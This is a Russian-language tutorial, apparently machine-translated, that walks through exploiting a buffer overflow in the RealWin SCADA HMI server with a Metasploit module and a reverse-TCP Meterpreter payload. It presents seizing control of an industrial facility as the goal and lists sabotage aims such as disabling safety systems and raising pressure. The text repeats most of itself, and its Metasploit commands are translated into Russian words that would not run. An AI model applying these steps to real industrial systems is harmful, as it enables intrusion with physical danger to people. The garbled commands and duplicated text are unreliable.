Добро пожаловать обратно, мои начинающие кибервоины SCADA/ICS!
Давайте начнём с поздравлений за вашу дальновидность и решение изучить вопросы взлома и безопасности SCADA/ICS. Это, безусловно, САМАЯ важная проблема безопасности в этом десятилетии!
В целом взломы SCADA/ICS были двух типов:
Интерфейс «человек -машина »
В большинстве систем SCADA/ICS предусмотрена специализированная система управления и мониторинга промышленной системы. В отрасли её часто называют человеко-машинным интерфейсом (ЧМИ). Эта система критически важна для управления промышленной системой, но также может стать серьёзным инструментом для злоумышленников. Если злоумышленнику удастся взломать ЧМИ, он станет владельцем вашей промышленной сети!
В большинстве случаев HMI находится за пределами корпоративной сети, как показано ниже. К сожалению, в некоторых случаях HMI находится внутри корпоративной сети, что делает его уязвимым для злоумышленника, скомпрометировавшего корпоративную сеть ( см. атаку BlackEnergy3 ).
Лучшая практика — изолировать HMI от корпоративной сети (см. модель топологии Purdue ниже).
Эти HMI обычно представляют собой системы на базе Windows со специальным программным обеспечением, установленным для управления и мониторинга всех промышленных систем, аналогичных показанным ниже.
Это программное обеспечение SCADA/HMI так же подвержено уязвимостям, как и любое программное обеспечение Windows.
В этом руководстве мы будем эксплуатировать уязвимую систему HMI, используя переполнение буфера в программном обеспечении HMI. Получив контроль над системой HMI, мы владеем всей промышленной сетью, и тогда могут быть выполнены неизвестные вредоносные действия, в том числе:
Шаг №1: Сервер RealWin
В этой атаке мы будем атаковать систему HMI с помощью RealWin Server. RealWin Server — это продукт DATAC RealWin, ирландской софтверной компании, приобретенной техасской Lufkin Industries.
Демонстрационный сервер RealWin можно загрузить здесь .
Установите его в систему Windows XP. Конечно, это относительно старый эксплойт, но индустрия SCADA/ICS очень медленно обновляет и совершенствует системы в силу специфики своего бизнеса (во многих случаях возможность обновления есть только раз в год). В любом случае, новички в кибербезопасности не осознают, что промышленные системы часто работают на очень старых и устаревших системах по разным причинам (см. Shodan, Поиск устаревших и уязвимых систем ).
После загрузки и установки сервера RealWin щелкните значок на рабочем столе, и откроется интерфейс, подобный показанному ниже.
Обратите внимание, что это программное обеспечение HMI предназначено для работы в телекоммуникационной, электроэнергетической, нефтегазовой, судостроительной и водохозяйственной отраслях. Если кликнуть на модуль «Электроснабжение», откроется карта объектов в районе Нью-Йорка (конечно, её можно настроить для любого региона).
Шаг №2: Откройте Metasploit
Следующий шаг — открыть Metasploit в Kali. Если вы не знакомы с Metasploit, остановитесь здесь и прочитайте мою серию статей о Metasploit, состоящую из нескольких частей, здесь .
Metasploit предлагает большое количество модулей SCADA/ICS. Полный список всех модулей SCADA Metasploit можно найти здесь .
kali > msfconsole
Теперь давайте поищем модули realwin HMI.
msf5> поиск realwin
Как видите выше, есть шесть модулей, в названиях которых есть Realwin. Давайте попробуем модуль realwin_scpc_initialize . Его можно загрузить в память, введя:
msf5> используйте exploit/windows/scada/realwin_scpc_initialize
Чтобы узнать больше об этом модуле, введите «info»
msf5 > информация
Как видно выше, этот модуль по умолчанию использует порт 912 и отправляет «специально созданный пакет» для выполнения произвольного кода в системе. В качестве полезной нагрузки автоматически была выбрана « windows/meterpreter/reverse_tcp ». Оставим значение по умолчанию как есть.
Шаг №3 : Подготовка эксплойта к выполнению
Теперь давайте рассмотрим параметры. В эксплойте их немного, и ещё меньше нужно настроить. Как видно ниже, для этого эксплойта нам нужно всего лишь установить параметры RHOSTS (удалённые хосты) и LHOST (локальный хост).
msf5 > показать параметры
Давайте установим эти переменные с IP-адресом нашей системы HMI (RHOSTS) и нашей системы Kali (LHOST).
Теперь мы готовы использовать этот HMI и, надеемся, взять под контроль весь промышленный объект!
msf5> эксплойт
Успех! Как видите выше, нам удалось получить приглашение meterpreter в системе HMI. При вводе «sysinfo» была выведена системная информация о системе HMI.
Давайте посмотрим, в каком каталоге системы HMI мы находимся, введя pwd.
meterpreter> pwd
Как видите, мы вошли в HMI через программу мониторинга DATAC Realwin, и представленные данные находятся в каталоге C
ROGR~1DATACReal.Win. Введя «dir», мы увидим все программные файлы этой программы мониторинга.
Краткое содержание
Безопасность SCADA/ICS — важнейшая проблема безопасности этого десятилетия, но мало кто уделяет ей должное внимание. В любом геополитическом противостоянии или конфликте противники непременно нацелятся на системы SCADA/ICS. В прошлом эти системы подвергались взлому как минимум двумя способами: атаками на протоколы или атаками на HMI. В этом руководстве мы продемонстрировали использование переполнения буфера для получения контроля над HMI и, таким образом, над всем промышленным объектом!
Давайте начнём с поздравлений за вашу дальновидность и решение изучить вопросы взлома и безопасности SCADA/ICS. Это, безусловно, САМАЯ важная проблема безопасности в этом десятилетии!
В целом взломы SCADA/ICS были двух типов:
- Взломать протоколы (modbus, DNP3, Profitnet и т. д.);
- Взломать человеко-машинный интерфейс (HMI)
Интерфейс «человек -машина »
В большинстве систем SCADA/ICS предусмотрена специализированная система управления и мониторинга промышленной системы. В отрасли её часто называют человеко-машинным интерфейсом (ЧМИ). Эта система критически важна для управления промышленной системой, но также может стать серьёзным инструментом для злоумышленников. Если злоумышленнику удастся взломать ЧМИ, он станет владельцем вашей промышленной сети!
В большинстве случаев HMI находится за пределами корпоративной сети, как показано ниже. К сожалению, в некоторых случаях HMI находится внутри корпоративной сети, что делает его уязвимым для злоумышленника, скомпрометировавшего корпоративную сеть ( см. атаку BlackEnergy3 ).
Лучшая практика — изолировать HMI от корпоративной сети (см. модель топологии Purdue ниже).
Эти HMI обычно представляют собой системы на базе Windows со специальным программным обеспечением, установленным для управления и мониторинга всех промышленных систем, аналогичных показанным ниже.
Это программное обеспечение SCADA/HMI так же подвержено уязвимостям, как и любое программное обеспечение Windows.
В этом руководстве мы будем эксплуатировать уязвимую систему HMI, используя переполнение буфера в программном обеспечении HMI. Получив контроль над системой HMI, мы владеем всей промышленной сетью, и тогда могут быть выполнены неизвестные вредоносные действия, в том числе:
- Отключение датчиков и сигнализаций
- Повышение температуры и давления
- Изменение состава и концентрации химикатов
- Изменение логики лестницы
- Отключение средств безопасности
Шаг №1: Сервер RealWin
В этой атаке мы будем атаковать систему HMI с помощью RealWin Server. RealWin Server — это продукт DATAC RealWin, ирландской софтверной компании, приобретенной техасской Lufkin Industries.
Демонстрационный сервер RealWin можно загрузить здесь .
Установите его в систему Windows XP. Конечно, это относительно старый эксплойт, но индустрия SCADA/ICS очень медленно обновляет и совершенствует системы в силу специфики своего бизнеса (во многих случаях возможность обновления есть только раз в год). В любом случае, новички в кибербезопасности не осознают, что промышленные системы часто работают на очень старых и устаревших системах по разным причинам (см. Shodan, Поиск устаревших и уязвимых систем ).
После загрузки и установки сервера RealWin щелкните значок на рабочем столе, и откроется интерфейс, подобный показанному ниже.
Обратите внимание, что это программное обеспечение HMI предназначено для работы в телекоммуникационной, электроэнергетической, нефтегазовой, судостроительной и водохозяйственной отраслях. Если кликнуть на модуль «Электроснабжение», откроется карта объектов в районе Нью-Йорка (конечно, её можно настроить для любого региона).
Шаг №2: Откройте Metasploit
Следующий шаг — открыть Metasploit в Kali. Если вы не знакомы с Metasploit, остановитесь здесь и прочитайте мою серию статей о Metasploit, состоящую из нескольких частей, здесь .
Metasploit предлагает большое количество модулей SCADA/ICS. Полный список всех модулей SCADA Metasploit можно найти здесь .
kali > msfconsole
Теперь давайте поищем модули realwin HMI.
msf5> поиск realwin
Как видите выше, есть шесть модулей, в названиях которых есть Realwin. Давайте попробуем модуль realwin_scpc_initialize . Его можно загрузить в память, введя:
msf5> используйте exploit/windows/scada/realwin_scpc_initialize
Чтобы узнать больше об этом модуле, введите «info»
msf5 > информация
Как видно выше, этот модуль по умолчанию использует порт 912 и отправляет «специально созданный пакет» для выполнения произвольного кода в системе. В качестве полезной нагрузки автоматически была выбрана « windows/meterpreter/reverse_tcp ». Оставим значение по умолчанию как есть.
Шаг №3 : Подготовка эксплойта к выполнению
Теперь давайте рассмотрим параметры. В эксплойте их немного, и ещё меньше нужно настроить. Как видно ниже, для этого эксплойта нам нужно всего лишь установить параметры RHOSTS (удалённые хосты) и LHOST (локальный хост).
msf5 > показать параметры
Давайте установим эти переменные с IP-адресом нашей системы HMI (RHOSTS) и нашей системы Kali (LHOST).
Теперь мы готовы использовать этот HMI и, надеемся, взять под контроль весь промышленный объект!
msf5> эксплойт
Успех! Как видите выше, нам удалось получить приглашение meterpreter в системе HMI. При вводе «sysinfo» была выведена системная информация о системе HMI.
Давайте посмотрим, в каком каталоге системы HMI мы находимся, введя pwd.
meterpreter> pwd
Как видите, мы вошли в HMI через программу мониторинга DATAC Realwin, и представленные данные находятся в каталоге C
Краткое содержание
Безопасность SCADA/ICS — важнейшая проблема безопасности этого десятилетия, но мало кто уделяет ей должное внимание. В любом геополитическом противостоянии или конфликте противники непременно нацелятся на системы SCADA/ICS. В прошлом эти системы подвергались взлому как минимум двумя способами: атаками на протоколы или атаками на HMI. В этом руководстве мы продемонстрировали использование переполнения буфера для получения контроля над HMI и, таким образом, над всем промышленным объектом!